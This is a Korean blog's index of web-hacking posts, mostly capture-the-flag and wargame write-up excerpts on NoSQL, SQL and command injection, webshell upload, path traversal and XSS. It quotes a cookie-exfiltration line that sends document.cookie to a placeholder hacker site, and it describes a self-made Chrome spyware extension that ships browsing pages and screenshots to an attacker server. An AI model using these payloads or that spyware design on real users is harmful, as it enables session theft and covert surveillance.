본문 바로가기
728x90
반응형

웹해킹16

웹 해킹 - 웹 패킷 전송 확장 프로그램 https://chrome.google.com/webstore/detail/talend-api-tester-free-ed/aejoelaoggembcahagimdiliamlcdmfm Talend API Tester - Free Edition Visually interact with REST, SOAP and HTTP APIs. chrome.google.com 웹 서버 API를 테스트할 때 도움이 되는 확장 프로그램입니다. 이전까지는 POSTMAN을 주로 사용했는데 이 녀석은 브라우저에서 조작이 가능하며, 심지어 브라우저가 가지고 있는 쿠키 값도 함께 전달이 가능합니다. 페이지에 로그인이 필요한 경우에 아주 편리합니다. 그리고 작성한 요청 정보들을 브라우저에 저장도 할 수 있음. 단점: 시크릿 모드에서 사용.. 2021. 12. 9.
웹 해킹 - NoSQL Injection 조건 표현식 https://book.hacktricks.xyz/pentesting-web/nosql-injection NoSQL injection - HackTricks Brute-force login usernames and passwords from POST login book.hacktricks.xyz [$ne] : 같지 않을 경우(not equals) [$regex] : 정규표현식 [$eq] : 같다(=) [$lt] : 작다() [$lte] : 작거나 같다() $regex로 패스워드 길이 알아내기 "password": {"$regex":".{1}"} => admin "password": {"$regex":".{2}"} => admin ... "password": {"$regex":".{5}"} => admin.. 2021. 12. 9.
Dreamhack - 워게임, Mango 풀이 https://dreamhack.io/wargame/challenges/90/ Mango Description 이 문제는 데이터베이스에 저장된 플래그를 획득하는 문제입니다. 플래그는 admin 계정의 비밀번호 입니다. 플래그의 형식은 DH{...} 입니다. {'uid': 'admin', 'upw': 'DH{32alphanumeric}'} Reference Serv dreamhack.io NOSQL Injection에 관한 문제다. 페이지로 들어가니깐 다짜고짜 /login에서 로그인을 하라고 뜬다. 주소에 복사 붙여넣기를 해보니 guest로 로그인이 됐는지 화면에는 guest만 뜸 만약에 uid 값으로 admin을 주게 되면 페이지에는 filter라고 뜨게 된다. 문제에서 제공하는 서버 파일을 확인해보면 .. 2021. 12. 9.
웹 해킹 - 크롬 스파이웨어 확장 프로그램 , Bad Extension 크롬 확장자를 이용해 브라우저 전용 스파이웨어를 만들어보았습니다. 우선 대상의 컴퓨터에 설치를 하는 건 상상에 맡기고, 확장 프로그램을 설치하게 되면 별 다른 이상 증상은 없습니다. 확장 프로그램 아이콘을 클릭해도 별 다른 기능은 없습니다. 하지만 만약 유저가 다른 페이지로 이동을 할 경우가 생기면 공격자의 PC에는 유저가 돌아다닌 페이지의 html 파일과 스크린샷 파일을 다운로드 받게 됩니다. 원리: 공격자가 파이썬 Flask로 CDN(콘텐츠 전송 네트워크) 서버를 열게 됩니다. 이 악성 확장 프로그램은 페이지를 이동할 때마다 공격자에게 자바스크립트 콘텐츠 파일을 요구를 하게 되고, 공격자 서버는 콘텐츠를 제공을 하게 됩니다. 그 제공받는 자바스크립트 파일에는 데이터를 전송하는 ajax 스크립트와 문서.. 2021. 12. 8.
Lord of SQLinjection - golem 이번에도 orge 문제처럼 쿼리문을 두 번 실행시키는 것을 보니, 블라인드 인젝션을 시도해야 하는 문제라는 것을 알게 됐다. 근데 이전 문제와 다르게 "="와 substr을 사용하지 못하도록 필터링을 거치게 된다. 하지만 위를 대체할 표현식들이 이미 존재한다. "="는 "LIKE"로 바꾸고 "substr"은 "substring"으로 바꿔주면 끝이다. 아래는 자동화 도구이다. orge에서 사용하던거를 "="를 "LIKE"로 변경하고, "substr"을 "substring"으로 변경해준 것 밖에 없다. import requests parameter = None cookie = {'PHPSESSID':'여기다 자신의 쿠키 값을 입력'} result = None solve = "" for i in range(1.. 2021. 12. 7.
Dreamhack - 워게임, web-misconf-1 https://dreamhack.io/wargame/challenges/45/ web-misconf-1 기본 설정을 사용한 서비스입니다. 로그인한 후 Organization에 플래그를 설정해 놓았습니다. Reference Server Side Basic dreamhack.io 로그인 페이지에서 admin/admin으로 로그인을 해보니 로그인이 성공했다. 그리고 Settings로 이동해서 Organization에 대한 설정 값을 찾아보았더니 플래그 값이 있었다. "초기 계정 설정은 매우 위험하다."라는 위험성을 알려주는 문제인 거 같다. 가정용 공유기들도 이와같은 이슈가 많았다. 2021. 11. 30.
웹 해킹 - XSS 공격으로 document.cookie 정보 가져오기 방지(HttpOnly) 해커는 아래처럼 document.cookie를 통해 중요한 쿠키 정보들을 수집하는 게 일반적 location.href = 'http://해커사이트/?cookies=' + document.cookie; 서버가 클라이언트에게 쿠키 값을 지정할 때에 HttpOnly라는 옵션을 추가시켜주면, (HttpOnly가 Http만 허용하고, Https는 허용하지 않는다 이게 아니다..) 클라이언트가 document.cookie를 아무리 출력해 보아도 해당 쿠키에 대한 정보는 출력이 되지 않는다. Set-Cookie: 쿠키명=쿠키값; path=/; HttpOnly HttpOnly 설정을 한 쿠키는 브라우저가 접근을 할 수 없도록 되버린 것. 당연히 서버에게 GET, POST 요청등을 할 때에는 HttpOnly 설정된 쿠키.. 2021. 11. 25.
Dreamhack - 워게임, command-injection-1 https://dreamhack.io/wargame/challenges/44/ command-injection-1 특정 Host에 ping 패킷을 보내는 서비스입니다. Command Injection을 통해 플래그를 획득하세요. 플래그는 flag.py에 있습니다. Reference Introduction of Webhacking dreamhack.io Ping 페이지로 들어가면 아이피를 입력하는 폼이 보입니다. 127.0.0.1을 넣고 submit을 시켜보니, Ping의 결과가 출력이 되어 나옵니다. 아이피를 전달하여 시스템 명령어를 실행시키는 모양입니다. ping 말고도 다른 명령어를 실행시켜보기 위해서 ;(세미콜론)을 삽입시켜주었습니다. 하지만 요청한 형식과 일치시키라는 경고문이 뜨게 되는데, 이는 .. 2021. 11. 24.
Dreamhack - 워게임, image-storage https://dreamhack.io/wargame/challenges/38/ image-storage php로 작성된 파일 저장 서비스입니다. 파일 업로드 취약점을 이용해 플래그를 획득하세요. 플래그는 /flag.txt에 있습니다. Reference Server-side Basic dreamhack.io php로 작성된 파일 저장 서비스입니다. upload 페이지로 가면 파일을 업로드할 수 있는 페이지가 출력이 되는데 * 이곳에서는 업로드할 파일에 대한 어떠한 검증이 이루어지지 않고 있습니다. 즉, .exe, .php, .bat 같은 민감한 확장자를 가진 파일들도 마음대로 업로드가 가능합니다. 전 이곳에 간단한 웹쉘을 업로드 하였습니다. 웹쉘이란? 서버 사이드 스크립트 언어로 작성된(php, jsp, .. 2021. 11. 24.
Dreamhack - 워게임, file-download-1 https://dreamhack.io/wargame/challenges/37/ file-download-1 File Download 취약점이 존재하는 웹 서비스입니다. flag.py를 다운로드 받으면 플래그를 획득할 수 있습니다. Reference Introduction of Webhacking dreamhack.io /read?name=../flag.py 를 입력해서 상위 디렉토리의 flag.py를 읽어 들이면 된다. 2021. 11. 24.
Dreamhack - 워게임, XSS-1 https://dreamhack.io/wargame/challenges/28/ xss-1 여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다. XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다. Reference Client-side Basic dreamhack.io /flag로 진입해 아래의 스크립트를 넣어주어서 실행하였다. XHR 요청으로 서버 자기 자신의 쿠키를 메모하는 스크립트이다. /memo로 들어가 주면? 플래그 값이 나온다. XHR 요청말고도, location.href를 이용해도 쿠키가 담긴 GET 요청을 보낼 수가 있다. 2021. 11. 22.
Dreamhack - 워게임, pathtraversal https://dreamhack.io/wargame/challenges/12/ pathtraversal 사용자의 정보를 조회하는 API 서버입니다. Path Traversal 취약점을 이용해 /api/flag에 있는 플래그를 획득하세요! Reference Server-side Basic dreamhack.io 문제에서 제공하는 소스코드를 먼저 분석 사용자는 /get_info 페이지에서 입력란에다 유저의 이름을 넣으면, 서버가 /api/user/{userid}로 GET 요청을 하여, 사용자 정보를 JSON 형식으로 가져오는 것임. 이때 userid는 위에 전역 변수로 정의된 users 딕셔너리를 참조한다. 0을 넣으면 guest에 대한 정보 출력 1을 넣으면 admin에 대한 정보 출력 노려야할 부분은 바.. 2021. 11. 21.
728x90
반응형